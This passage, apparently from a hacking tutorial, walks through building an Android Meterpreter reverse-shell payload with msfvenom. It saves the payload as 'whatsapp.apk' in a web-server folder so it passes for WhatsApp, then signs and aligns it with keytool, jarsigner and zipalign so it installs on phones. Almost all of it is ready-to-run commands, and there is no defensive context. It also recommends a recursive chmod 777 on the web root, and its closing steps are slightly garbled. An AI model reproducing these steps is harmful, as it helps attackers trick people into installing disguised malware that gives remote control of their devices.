By using MSFvenom, we create a payload .apk file. For this, we use the following command:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.240.161 LPORT=4444 R > /var/www/html/whatsapp.apk
- -p — Payload to be used
- LHOST — Localhost IP to receive a back connection (Check yours with ifconfig command)
- LPORT — Localhost port on which the connection listen for the victim (we set it to 4444)
- R — Raw format (we select .apk)
- Location — To save the file
Using above command on my terminal i got a Permission denied message as mentioned below.
bash: /var/www/html/whatsapp.apk: Permission denied
And I fixed the above issue using the below command
sudo chmod 777 /var/www/html -R
Created File will be available on var/www/html/ folder
After we successfully created the .apk file, we need to sign a certificate because Android mobile devices are not allowed to install apps without the appropriately signed certificate. Android devices only install signed .apk files.
We need to sign the .apk file manually in Kali Linux using:
- Keytool (preinstalled)
- jar signer (preinstalled)
- zipalign (need to install)
Use Keytool for making keystore. Below mentioned command will create a keystore.
keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000
Next step is to Signing our whatsapp.apk file with JARsigner
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore /var/www/html/whatsapp.apk hacked
You may face an issue “bash: jarsigner: command not found”. i fixed this error by installing the below.
sudo apt-get install openjdk-11-jdk
Verifying the .apk using JARsigner
jarsigner -verify -verbose -certs /var/www/html/whatsapp.apk
Zipalign is not preinstalled in Kali Linux, so you will have to install it first.
sudo apt-get install zipalign
Verifying the .apk created and saving to anew file using Zipalign
zipalign -v 4 /var/www/html/whatsapp.apk /var/www
Now we have signed our android_shell.apk file successfully and it can be run on any Android environment. Our new filename is Whatssappapk after the verification with Zipalign.